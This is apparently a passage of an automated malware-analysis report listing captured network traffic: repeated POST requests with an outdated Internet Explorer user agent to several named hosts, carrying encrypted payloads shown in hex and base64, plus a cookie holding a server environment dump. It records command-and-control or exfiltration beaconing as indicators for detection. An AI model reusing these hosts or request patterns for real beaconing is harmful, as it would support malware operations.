On+lOkKR4YxFXk+/NZ81c8XH3AxSfpUqloMB+6aUtAsTln1w0zRMlfF7QqKvbHQfSOWYvEEt+UIXPvAZ5Z6Jmc5zgIInVCOFRimR/cJt/e3shPKkMvyiflwS+xTqc+75oFZttzB8mYlZPy5jyRb5LBpvx1QNKEQXSGRPMpCl3fuIF1WVpm+2mRe44EEMpfWBnm0XxKWHBvUxsMcHOcs6Tjt9qG5MGEWNmv33CeKIYfkm4INadrWMcdFdQnzzNdVUbCMOu4RZJHnhwxgM4Pa8Y0850nLHtn/v5872x7WQJKKJn1BpVUIVcscy2T9Bp1xAqfFsOfcVDIfniCtiZc7QjeoArCeyJF3dBfAYpadGusnCZDttE8GIBsl9bDw+Egkjx/3KbVS9/Yvw0jWBQcp4RqqzOCQ3C9iT8zMDiQQMOZ4gWyLHndy5pV2l4HGFKHzs8e2PcP3PS/VQ20HIhuL/NJfQNF3k9iuq5buExbYN8I+3xe3g3k9pvjDERds88/NwT1kDhrA6DxlPAom5ReMXTDB4tGj+Q1gFzvxFmJXMaI1lg0REqCMps9VvFhwhRdBpqZ+dUcw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 77 54 6d 45 49 2f 6e 51 34 49 78 47 6f 6d 70 4e 69 4d 5a 74 58 35 4b 62 53 79 6a 58 4f 64 46 6d 50 66 75 52 32 62 67 50 4e 4b 37 71 4c 35 62 6b 6f 57 75 50 71 57 7a 6d 70 7a 44 45 42 6f 30 58 69 4e 31 66 44 37 7a 79 62 68 78 4f 78 53 62 2f 58 57 72 74 53 4f 78 38 4f 55 5a 79 57 2b 35 45 45 51 59 6d 4e 67 71 77 66 39 48 66 4f 44 48 6e 6c 70 76 73 59 77 2f 70 48 62 48 62 6f 35 71 37 57 73 4d 4c 73 6c 5a 38 5a 31 71 47 6b 35 64 42 50 36 63 43 4c 30 56 75 74 4d 6e 78 72 31 2f 38 65 4e 43 37 32 69 64 50 39 2b 33 49 38 46 43 74 6d 68 72 75 63 78 43 37 6d 2b 62 46 74 69 6c 77 52 6b 43 69 62 46 2f 4c 77 6e 50 63 6c 6c 42 67 43 67 51 34 75 78 4f 30 71 58 77 57 7a 77 6a 68 58 30 6f 31 53 53 64 47 6d 6d 52 55 32 63 42 44 4d 38 73 5a 59 35 31 4c 52 4c 32 37 71 79 66 44 55 58 74 46 62 41 4b 6c 5a 59 32 70 62 30 52 79 74 36 37 48 47 42 48 72 75 2b 77 34 57 59 70 50 38 4e 78 2b 42 4a 46 53 66 6b 44 35 59 5a 65 77 52 62 33 35 78 35 2b 7a 55 58 36 57 7a 4a 63 77 41 6f 30 67 6d 70 63 54 54 69 32 61 69 51 69 6e 74 41 61 50 43 73 33 50 58 35 6b 5a 61 42 54 45 51 2b 6a 32 59 50 49 76 68 6a 77 4a 4b 33 67 44 76 41 75 68 2b 48 75 36 6c 30 76 49 42 5a 38 41 44 4b 56 61 32 79 48 58 6d 76 50 33 66 30 36 6f 36 6c 66 64 47 5a 70 63 38 6e 6e 49 4b 73 56 4f 77 42 7a 46 31 35 49 6b 7a 54 63 73 30 56 6a 65 4e 74 76 58 70 44 42 61 75 6f 4a 6b 38 42 75 75 6e 67 48 66 2b 68 39 42 78 68 58 7a 74 70 39 39 57 2b 56 43 7a 33 4d 7a 63 33 62 54 46 34 51 44 57 65 2f 31 6e 67 4c 58 52 4e 51 77 6e 43 63 50 35 6c 53 63 73 4d 39 75 66 63 65 69 79 41 6d 71 44 76 49 57 51 71 4d 33 70 76 30 38 53 53 6b 73 65 73 74 61 49 62 6d 47 38 77 35 56 71 71 76 44 53 51 3d 3d Data Ascii: wTmEI/nQ4IxGompNiMZtX5KbSyjXOdFmPfuR2bgPNK7qL5bkoWuPqWzmpzDEBo0XiN1fD7zybhxOxSb/XWrtSOx8OUZyW+5EEQYmNgqwf9HfODHnlpvsYw/pHbHbo5q7WsMLslZ8Z1qGk5dBP6cCL0VutMnxr1/8eNC72idP9+3I8FCtmhrucxC7m+bFtilwRkCibF/LwnPcllBgCgQ4uxO0qXwWzwjhX0o1SSdGmmRU2cBDM8sZY51LRL27qyfDUXtFbAKlZY2pb0Ryt67HGBHru+w4WYpP8Nx+BJFSfkD5YZewRb35x5+zUX6WzJcwAo0gmpcTTi2aiQintAaPCs3PX5kZaBTEQ+j2YPIvhjwJK3gDvAuh+Hu6l0vIBZ8ADKVa2yHXmvP3f06o6lfdGZpc8nnIKsVOwBzF15IkzTcs0VjeNtvXpDBauoJk8BuungHf+h9BxhXztp99W+VCz3Mzc3bTF4QDWe/1ngLXRNQwnCcP5lScsM9ufceiyAmqDvIWQqM3pv08SSksestaIbmG8w5VqqvDSQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 69 62 52 63 4a 55 76 67 34 49 78 35 4f 35 56 6c 6f 6a 6d 4c 35 4c 51 73 78 2b 57 52 47 4e 58 54 72 36 34 76 42 7a 48 70 38 4c 76 41 7a 52 36 50 6b 7a 71 46 66 4f 6c 76 74 55 2f 6e 68 4f 62 73 7a 61 39 52 44 67 36 63 45 53 44 6d 75 63 39 7a 4f 44 4d 65 68 6d 56 68 78 35 7a 72 59 2b 4f 6a 70 73 65 6d 57 4c 66 74 4d 32 75 79 35 38 6d 38 73 51 61 48 46 50 71 61 66 78 61 6c 78 59 34 57 64 33 56 36 7a 52 50 58 58 56 48 35 68 34 72 59 53 4c 51 6e 32 65 63 78 5a 53 44 52 48 52 37 31 66 62 52 71 52 30 33 52 68 52 4e 47 75 66 30 34 38 50 47 59 52 70 4c 74 43 33 57 37 6e 41 4a 6f 51 76 51 6f 45 54 58 31 39 61 72 58 53 48 52 54 4b 65 47 4b 75 42 42 78 6c 77 33 33 43 65 62 51 55 77 51 6a 78 44 4f 6e 36 47 61 52 50 70 67 34 39 59 4b 44 69 73 69 2f 2b 6b 71 49 4c 34 49 4a 64 45 2b 32 62 59 2b 33 6a 7a 64 6b 37 49 67 4b 50 38 45 32 68 2b 5a 73 38 2b 75 33 4e 6b 41 6e 2b 34 49 57 70 4e 65 32 66 75 49 54 52 63 50 4e 32 36 54 6f 45 77 2b 47 77 38 48 6f 38 41 38 73 41 51 37 68 38 4f 38 35 77 77 77 62 66 54 7a 33 64 6c 6c 78 52 66 44 46 48 7a 51 4d 78 53 65 66 7a 75 4f 31 68 34 67 49 58 6e 71 39 6f 43 50 70 38 65 4c 38 43 4c 38 74 51 76 52 6d 41 64 62 39 4a 5a 35 7a 74 68 42 62 43 5a 4a 37 59 49 6e 62 6c 47 42 38 6a 49 4d 2f 6f 30 67 75 78 53 6a 4a 4c 45 66 6c 51 57 4a 6d 43 69 33 61 63 74 73 4e 63 30 49 54 77 4e 73 53 37 32 36 4b 31 34 65 6d 36 33 79 61 52 6e 33 59 59 4d 6c 42 6d 2b 4f 33 54 65 6f 31 43 43 6d 68 34 48 5a 67 4d 66 5a 6f 47 4e 7a 70 4d 53 56 50 59 34 76 68 4b 55 7a 38 6b 72 2f 55 71 48 71 54 73 70 2f 4d 62 77 53 64 31 52 56 36 49 5a 6a 37 4a 32 4e 33 4f 35 53 65 63 30 55 73 62 45 74 38 69 46 4e 32 4c 62 49 4b 7a 62 79 38 41 6c 34 48 43 4e 66 45 4b 78 6f 36 56 31 41 6f 72 68 77 65 67 43 63 61 42 52 34 73 32 66 35 66 2b 59 75 31 73 51 3d 3d Data Ascii: ibRcJUvg4Ix5O5VlojmL5LQsx+WRGNXTr64vBzHp8LvAzR6PkzqFfOlvtU/nhObsza9RDg6cESDmuc9zODMehmVhx5zrY+OjpsemWLftM2uy58m8sQaHFPqafxalxY4Wd3V6zRPXXVH5h4rYSLQn2ecxZSDRHR71fbRqR03RhRNGuf048PGYRpLtC3W7nAJoQvQoETX19arXSHRTKeGKuBBxlw33CebQUwQjxDOn6GaRPpg49YKDisi/+kqIL4IJdE+2bY+3jzdk7IgKP8E2h+Zs8+u3NkAn+4IWpNe2fuITRcPN26ToEw+Gw8Ho8A8sAQ7h8O85wwwbfTz3dllxRfDFHzQMxSefzuO1h4gIXnq9oCPp8eL8CL8tQvRmAdb9JZ5zthBbCZJ7YInblGB8jIM/o0guxSjJLEflQWJmCi3actsNc0ITwNsS726K14em63yaRn3YYMlBm+O3Teo1CCmh4HZgMfZoGNzpMSVPY4vhKUz8kr/UqHqTsp/MbwSd1RV6IZj7J2N3O5Sec0UsbEt8iFN2LbIKzby8Al4HCNfEKxo6V1AorhwegCcaBR4s2f5f+Yu1sQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fnsds.orgCache-Control: no-cacheData Raw: 58 6b 59 49 6a 53 34 2b 35 49 78 2f 48 50 64 5a 4f 57 39 4b 5a 35 47 2f 5a 51 79 75 6d 7a 44 71 51 71 6b 61 62 6e 50 46 42 43 72 38 48 6d 62 39 4b 51 64 31 76 43 50 48 73 48 71 45 51 30 64 4b 6d 32 56 41 59 64 78 67 6d 66 53 7a 68 6e 55 58 48 4b 76 6a 7a 66 49 4b 4d 44 32 6a 4b 43 4b 49 74 4c 6a 4f 31 5a 7a 45 66 53 75 33 51 64 6d 61 39 2f 38 41 44 6f 37 72 6f 4e 2b 6b 73 75 6d 51 4c 6c 31 75 6b 71 68 6f 2f 67 46 52 31 4c 48 79 49 2b 6b 45 43 4c 36 4d 59 61 2b 63 4d 64 6d 2f 44 63 52 75 45 59 30 31 70 33 51 44 4f 71 46 55 39 67 4d 45 2f 43 6c 32 61 2f 32 49 74 4c 34 4c 65 65 44 54 50 7a 48 75 2f 4a 30 69 50 58 4d 4a 4a 6a 63 63 55 4f 32 64 4b 68 63 71 4d 7a 4e 35 79 79 30 31 39 6b 57 6e 4b 46 7a 6f 72 65 64 62 62 32 4f 46 34 33 2f 4c 33 64 67 2b 61 47 76 36 75 70 31 57 54 32 4c 50 38 73 45 66 2b 2f 64 51 33 74 77 48 76 78 35 48 53 38 61 4a 71 4d 71 53 74 31 4d 69 72 59 4e 57 53 49 61 47 4f 4b 6c 7a 78 70 78 30 4a 32 42 5a 69 75 66 47 6e 39 4b 30 71 55 5a 4f 44 59 2b 71 65 71 34 6b 6a 79 5a 33 69 50 62 4c 47 4f 37 6c 47 61 54 2f 6e 6a 55 7a 37 55 76 6e 63 51 6e 2f 66 79 50 4c 4c 77 69 4b 74 6c 31 67 62 68 55 42 31 6a 67 36 6c 4e 47 47 47 30 50 49 41 77 34 61 33 68 62 54 61 6b 71 7a 53 55 42 4e 32 78 41 33 58 53 50 59 33 32 71 7a 4b 4a 32 51 48 58 74 50 65 62 4c 6b 51 62 4b 72 38 37 47 32 69 39 56 41 53 78 4c 68 74 30 6a 70 46 4c 58 59 52 36 78 4f 4a 36 79 65 30 6d 58 74 37 36 39 4e 75 65 48 7a 4e 50 43 6f 6d 37 57 73 39 71 77 65 32 39 45 39 6f 4b 61 6c 57 30 75 6f 6b 6a 75 6e 38 57 53 35 48 31 70 61 78 53 42 4b 76 79 57 2f 43 36 4e 50 61 38 43 4a 70 59 50 56 64 6a 2f 2f 71 4a 59 7a 33 6b 67 73 48 6a 4e 63 79 6d 6e 50 47 31 58 71 44 58 45 45 74 65 6a 30 73 77 3d 3d Data Ascii: XkYIjS4+5Ix/HPdZOW9KZ5G/ZQyumzDqQqkabnPFBCr8Hmb9KQd1vCPHsHqEQ0dKm2VAYdxgmfSzhnUXHKvjzfIKMD2jKCKItLjO1ZzEfSu3Qdma9/8ADo7roN+ksumQLl1ukqho/gFR1LHyI+kECL6MYa+cMdm/DcRuEY01p3QDOqFU9gME/Cl2a/2ItL4LeeDTPzHu/J0iPXMJJjccUO2dKhcqMzN5yy019kWnKFzoredbb2OF43/L3dg+aGv6up1WT2LP8sEf+/dQ3twHvx5HS8aJqMqSt1MirYNWSIaGOKlzxpx0J2BZiufGn9K0qUZODY+qeq4kjyZ3iPbLGO7lGaT/njUz7UvncQn/fyPLLwiKtl1gbhUB1jg6lNGGG0PIAw4a3hbTakqzSUBN2xA3XSPY32qzKJ2QHXtPebLkQbKr87G2i9VASxLht0jpFLXYR6xOJ6ye0mXt769NueHzNPCom7Ws9qwe29E9oKalW0uokjun8WS5H1paxSBKvyW/C6NPa8CJpYPVdj//qJYz3kgsHjNcymnPG1XqDXEEtej0sw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 77 54 6d 45 49 2f 6e 51 34 49 78 47 6f 6d 70 4e 69 4d 5a 74 58 35 4b 62 53 79 6a 58 4f 64 46 6d 50 66 75 52 32 62 67 50 4e 4b 37 71 4c 35 62 6b 6f 57 75 50 71 57 7a 6d 70 7a 44 45 42 6f 30 58 69 4e 31 66 44 37 7a 79 62 68 78 4f 78 53 62 2f 58 57 72 74 53 4f 78 38 4f 55 5a 79 57 2b 35 45 45 51 59 6d 4e 67 71 77 66 39 48 66 4f 44 48 6e 6c 70 76 73 59 77 2f 70 48 62 48 62 6f 35 71 37 57 73 4d 4c 73 6c 5a 38 5a 31 71 47 6b 35 64 42 50 36 63 43 4c 30 56 75 74 4d 6e 78 72 31 2f 38 65 4e 43 37 32 69 64 50 39 2b 33 49 38 46 43 74 6d 68 72 75 63 78 43 37 6d 2b 62 46 74 69 6c 77 52 6b 43 69 62 46 2f 4c 77 6e 50 63 6c 6c 42 67 43 67 51 34 75 78 4f 30 71 58 77 57 7a 77 6a 68 58 30 6f 31 53 53 64 47 6d 6d 52 55 32 63 42 44 4d 38 73 5a 59 35 31 4c 52 4c 32 37 71 79 66 44 55 58 74 46 62 41 4b 6c 5a 59 32 70 62 30 52 79 74 36 37 48 47 42 48 72 75 2b 77 34 57 59 70 50 38 4e 78 2b 42 4a 46 53 66 6b 44 35 59 5a 65 77 52 62 33 35 78 35 2b 7a 55 58 36 57 7a 4a 63 77 41 6f 30 67 6d 70 63 54 54 69 32 61 69 51 69 6e 74 41 61 50 43 73 33 50 58 35 6b 5a 61 42 54 45 51 2b 6a 32 59 50 49 76 68 6a 77 4a 4b 33 67 44 76 41 75 68 2b 48 75 36 6c 30 76 49 42 5a 38 41 44 4b 56 61 32 79 48 58 6d 76 50 33 66 30 36 6f 36 6c 66 64 47 5a 70 63 38 6e 6e 49 4b 73 56 4f 77 42 7a 46 31 35 49 6b 7a 54 63 73 30 56 6a 65 4e 74 76 58 70 44 42 61 75 6f 4a 6b 38 42 75 75 6e 67 48 66 2b 68 39 42 78 68 58 7a 74 70 39 39 57 2b 56 43 7a 33 4d 7a 63 33 62 54 46 34 51 44 57 65 2f 31 6e 67 4c 58 52 4e 51 77 6e 43 63 50 35 6c 53 63 73 4d 39 75 66 63 65 69 79 41 6d 71 44 76 49 57 51 71 4d 33 70 76 30 38 53 53 6b 73 65 73 74 61 49 62 6d 47 38 77 35 56 71 71 76 44 53 51 3d 3d Data Ascii: wTmEI/nQ4IxGompNiMZtX5KbSyjXOdFmPfuR2bgPNK7qL5bkoWuPqWzmpzDEBo0XiN1fD7zybhxOxSb/XWrtSOx8OUZyW+5EEQYmNgqwf9HfODHnlpvsYw/pHbHbo5q7WsMLslZ8Z1qGk5dBP6cCL0VutMnxr1/8eNC72idP9+3I8FCtmhrucxC7m+bFtilwRkCibF/LwnPcllBgCgQ4uxO0qXwWzwjhX0o1SSdGmmRU2cBDM8sZY51LRL27qyfDUXtFbAKlZY2pb0Ryt67HGBHru+w4WYpP8Nx+BJFSfkD5YZewRb35x5+zUX6WzJcwAo0gmpcTTi2aiQintAaPCs3PX5kZaBTEQ+j2YPIvhjwJK3gDvAuh+Hu6l0vIBZ8ADKVa2yHXmvP3f06o6lfdGZpc8nnIKsVOwBzF15IkzTcs0VjeNtvXpDBauoJk8BuungHf+h9BxhXztp99W+VCz3Mzc3bTF4QDWe/1ngLXRNQwnCcP5lScsM9ufceiyAmqDvIWQqM3pv08SSksestaIbmG8w5VqqvDSQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWktVSVIyZVF0YlVLSEV3bThjd0V3Z0FBQUFzIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaS1VJUjJlUXRiVUtIRXdtOGN3RXdnQUFBQXMiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjYwNCIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNSIsIlJFUVVFU1RfU0NIRU1FIjoiaHR0cCIsIkNPTlRFWFRfUFJFRklYIjoiXC9zeXN0ZW0tYmluXC8iLCJDT05URVhUX0RPQ1VNRU5UX1JPT1QiOiJcL2t1bmRlblwvdXNyXC9saWJcL2NnaS1iaW5cLyIsIlJFTU9URV9QT1JUIjoiNjA1NjYiLCJSRURJUkVDVF9VUkwiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfTUVUSE9EIjoiUE9TVCIsIlFVRVJZX1NUUklORyI6IiIsIlNDUklQVF9OQU1FIjoiXC9pbmRleC5waHAiLCJTVEFUVVMiOiIyMDAiLCJPUklHX1BBVEhfSU5GTyI6IlwvaW5kZXgucGhwIiwiT1JJR19QQVRIX1RSQU5TTEFURUQiOiJcL2t1bmRlblwvaG9tZXBhZ2VzXC85XC9kMzI4MTUxODQ3XC9odGRvY3NcL2NsaWNrYW5kYnVpbGRzXC9teXJvcGNiXC9pbmRleC5waHAiLCJQSFBfU0VMRiI6IlwvaW5kZXgucGhwIiwiUkVRVUVTVF9USU1FX0ZMT0FUIjoxNjg4NTM3MTU5LjExOTgwMSwiUkVRVUVTVF9USU1FIjoxNjg4NTM3MTU5LCJhcmd2IjpbXSwiYXJnYyI6MH0%3D; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjUifQ%3D%3D; shield-notbot-nonce=c8fd351bd1
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 6e 34 4f 70 33 6a 2f 47 47 49 30 48 78 63 64 44 48 68 37 56 6f 63 69 75 73 56 71 56 70 2b 32 42 34 39 47 72 32 2b 45 41 2f 71 38 7a 67 64 75 66 6c 32 77 41 68 51 64 46 51 32 4d 7a 51 36 48 52 51 79 43 76 6f 2b 52 65 79 64 78 37 58 55 7a 50 5a 73 2f 7a 32 35 57 56 4b 49 43 72 4e 38 6b 43 54 6e 57 73 36 42 62 53 39 62 79 6b 74 47 35 52 47 66 30 58 62 55 6b 65 44 49 52 6f 43 65 2f 2b 52 4a 38 54 49 79 69 42 6c 52 59 68 56 59 43 46 74 2f 4d 61 39 57 35 55 32 6f 47 64 55 56 72 34 61 6c 4d 71 6c 38 58 58 2f 72 30 61 62 49 42 76 46 73 72 6f 70 4f 65 4f 57 46 4b 4b 54 30 61 51 4f 4d 33 70 63 32 36 55 67 62 49 38 4b 30 45 4e 51 56 5a 43 78 76 39 4f 51 64 62 6e 7a 4a 6f 4e 56 67 67 72 44 46 37 35 66 61 7a 79 50 72 65 2f 32 42 37 57 42 64 6f 2f 38 36 57 43 64 7a 6c 51 6c 6b 67 2f 38 34 2f 31 55 76 52 68 6a 69 6e 4a 48 45 45 69 74 57 5a 64 35 49 32 51 4e 45 6a 4c 6e 43 66 78 34 2f 34 79 32 63 42 4b 72 57 39 51 2f 66 30 53 35 39 4f 53 50 4f 7a 62 55 33 7a 68 6f 49 6f 33 4c 41 73 32 31 6a 74 71 5a 73 6a 69 5a 64 59 67 7a 70 6e 51 74 56 57 33 45 79 7a 32 58 56 5a 35 52 59 42 64 55 38 71 30 38 76 46 66 78 42 70 48 4e 35 67 69 48 4e 61 6e 70 51 37 30 64 38 49 2b 70 77 2b 39 76 63 39 4b 6f 64 67 4a 44 6e 7a 58 4a 78 45 38 6d 37 58 6f 42 64 57 4c 4e 44 58 4f 6b 63 58 41 4d 56 41 66 41 71 50 65 77 36 54 33 62 59 77 45 63 35 47 36 7a 4c 70 56 4d 65 4a 4a 37 6d 57 39 55 59 46 34 51 44 4d 36 31 6f 64 47 57 62 37 66 41 73 79 46 37 4c 63 39 39 48 65 75 41 64 38 44 58 69 7a 6f 62 36 44 6f 32 70 69 4d 62 68 33 74 50 76 6c 67 33 48 4d 6c 62 2b 36 68 70 4d 56 53 4c 34 33 33 6d 6b 4f 68 57 6a 4a 37 Data Ascii: n4Op3j/GGI0HxcdDHh7VociusVqVp+2B49Gr2+EA/q8zgdufl2wAhQdFQ2MzQ6HRQyCvo+Reydx7XUzPZs/z25WVKICrN8kCTnWs6BbS9byktG5RGf0XbUkeDIRoCe/+RJ8TIyiBlRYhVYCFt/Ma9W5U2oGdUVr4alMql8XX/r0abIBvFsropOeOWFKKT0aQOM3pc26UgbI8K0ENQVZCxv9OQdbnzJoNVggrDF75fazyPre/2B7WBdo/86WCdzlQlkg/84/1UvRhjinJHEEitWZd5I2QNEjLnCfx4/4y2cBKrW9Q/f0S59OSPOzbU3zhoIo3LAs21jtqZsjiZdYgzpnQtVW3Eyz2XVZ5RYBdU8q08vFfxBpHN5giHNanpQ70d8I+pw+9vc9KodgJDnzXJxE8m7XoBdWLNDXOkcXAMVAfAqPew6T3bYwEc5G6zLpVMeJJ7mW9UYF4QDM61odGWb7fAsyF7Lc99HeuAd8DXizob6Do2piMbh3tPvlg3HMlb+6hpMVSL433mkOhWjJ7
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 38 37 43 4f 7a 4c 6f 76 47 49 31 4d 49 35 4d 4e 58 58 76 58 73 76 32 41 48 6b 51 71 61 73 69 6b 6a 70 57 6e 67 64 4d 31 57 4e 41 6f 56 42 4a 50 32 58 53 4e 5a 78 58 69 34 6d 33 59 50 61 79 37 37 70 56 6c 44 5a 72 4e 62 69 61 72 72 46 76 6c 35 45 72 6e 4a 45 5a 32 68 4e 44 4d 6b 48 54 67 6d 31 66 70 56 78 50 47 31 66 59 6d 5a 31 73 36 55 35 43 39 4a 62 37 6b 51 34 59 78 48 66 66 4e 67 62 70 68 4b 4a 32 61 54 43 48 72 61 33 54 63 32 6b 6e 37 32 2f 39 32 37 64 74 35 49 58 77 32 79 39 77 4c 67 79 7a 52 7a 30 43 49 72 75 31 72 56 56 6f 4b 69 70 79 39 32 78 32 7a 50 72 44 6b 39 5a 56 37 65 50 57 72 44 44 47 59 53 59 56 76 59 32 2b 32 64 68 70 39 70 47 52 79 4f 50 2f 71 59 6b 4e 73 72 67 4f 73 56 64 34 6c 6b 65 4b 4f 6b 4e 58 6e 39 7a 56 42 78 46 6a 52 62 59 69 68 6e 57 30 2b 45 65 59 4c 61 69 57 57 43 77 6f 69 34 46 76 64 6f 36 72 4c 2b 76 41 39 65 62 39 34 77 78 58 50 2f 31 38 69 39 62 57 76 44 6a 33 53 64 36 65 39 55 38 49 48 6a 74 56 56 43 7a 2f 6b 56 32 56 71 63 39 32 47 46 4c 5a 63 6f 31 68 63 48 77 71 44 44 69 41 33 71 58 30 36 59 56 50 4f 34 48 55 33 55 43 31 2f 71 36 68 51 66 7a 75 57 68 34 6a 4d 68 75 68 61 68 63 2b 4b 5a 44 66 4f 79 74 2f 4d 72 56 58 52 30 34 39 4f 33 64 57 6c 77 64 49 4a 70 32 59 79 64 61 6a 56 6d 68 65 33 44 59 65 7a 2f 62 44 6e 5a 5a 65 71 54 75 56 59 58 62 63 36 75 37 42 32 79 4a 42 4d 38 50 61 4b 74 2b 31 41 64 57 39 64 7a 64 46 42 41 4b 68 31 75 73 71 61 4b 50 69 6d 37 33 35 53 58 53 45 49 79 65 50 79 6a 30 47 46 34 69 57 6e 41 55 33 4b 33 66 66 59 66 57 75 36 35 49 58 36 75 63 59 73 33 6e 6e 69 58 2f 79 34 35 4a 78 5a 31 56 42 70 4f 46 58 4c 76 6d 49 3d Data Ascii: 87COzLovGI1MI5MNXXvXsv2AHkQqasikjpWngdM1WNAoVBJP2XSNZxXi4m3YPay77pVlDZrNbiarrFvl5ErnJEZ2hNDMkHTgm1fpVxPG1fYmZ1s6U5C9Jb7kQ4YxHffNgbphKJ2aTCHra3Tc2kn72/927dt5IXw2y9wLgyzRz0CIru1rVVoKipy92x2zPrDk9ZV7ePWrDDGYSYVvY2+2dhp9pGRyOP/qYkNsrgOsVd4lkeKOkNXn9zVBxFjRbYihnW0+EeYLaiWWCwoi4Fvdo6rL+vA9eb94wxXP/18i9bWvDj3Sd6e9U8IHjtVVCz/kV2Vqc92GFLZco1hcHwqDDiA3qX06YVPO4HU3UC1/q6hQfzuWh4jMhuhahc+KZDfOyt/MrVXR049O3dWlwdIJp2YydajVmhe3DYez/bDnZZeqTuVYXbc6u7B2yJBM8PaKt+1AdW9dzdFBAKh1usqaKPim735SXSEIyePyj0GF4iWnAU3K3ffYfWu65IX6ucYs3nniX/y45JxZ1VBpOFXLvmI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 38 37 43 4f 7a 4c 6f 76 47 49 31 4d 49 35 4d 4e 58 58 76 58 73 76 32 41 48 6b 51 71 61 73 69 6b 6a 70 57 6e 67 64 4d 31 57 4e 41 6f 56 42 4a 50 32 58 53 4e 5a 78 58 69 34 6d 33 59 50 61 79 37 37 70 56 6c 44 5a 72 4e 62 69 61 72 72 46 76 6c 35 45 72 6e 4a 45 5a 32 68 4e 44 4d 6b 48 54 67 6d 31 66 70 56 78 50 47 31 66 59 6d 5a 31 73 36 55 35 43 39 4a 62 37 6b 51 34 59 78 48 66 66 4e 67 62 70 68 4b 4a 32 61 54 43 48 72 61 33 54 63 32 6b 6e 37 32 2f 39 32 37 64 74 35 49 58 77 32 79 39 77 4c 67 79 7a 52 7a 30 43 49 72 75 31 72 56 56 6f 4b 69 70 79 39 32 78 32 7a 50 72 44 6b 39 5a 56 37 65 50 57 72 44 44 47 59 53 59 56 76 59 32 2b 32 64 68 70 39 70 47 52 79 4f 50 2f 71 59 6b 4e 73 72 67 4f 73 56 64 34 6c 6b 65 4b 4f 6b 4e 58 6e 39 7a 56 42 78 46 6a 52 62 59 69 68 6e 57 30 2b 45 65 59 4c 61 69 57 57 43 77 6f 69 34 46 76 64 6f 36 72 4c 2b 76 41 39 65 62 39 34 77 78 58 50 2f 31 38 69 39 62 57 76 44 6a 33 53 64 36 65 39 55 38 49 48 6a 74 56 56 43 7a 2f 6b 56 32 56 71 63 39 32 47 46 4c 5a 63 6f 31 68 63 48 77 71 44 44 69 41 33 71 58 30 36 59 56 50 4f 34 48 55 33 55 43 31 2f 71 36 68 51 66 7a 75 57 68 34 6a 4d 68 75 68 61 68 63 2b 4b 5a 44 66 4f 79 74 2f 4d 72 56 58 52 30 34 39 4f 33 64 57 6c 77 64 49 4a 70 32 59 79 64 61 6a 56 6d 68 65 33 44 59 65 7a 2f 62 44 6e 5a 5a 65 71 54 75 56 59 58 62 63 36 75 37 42 32 79 4a 42 4d 38 50 61 4b 74 2b 31 41 64 57 39 64 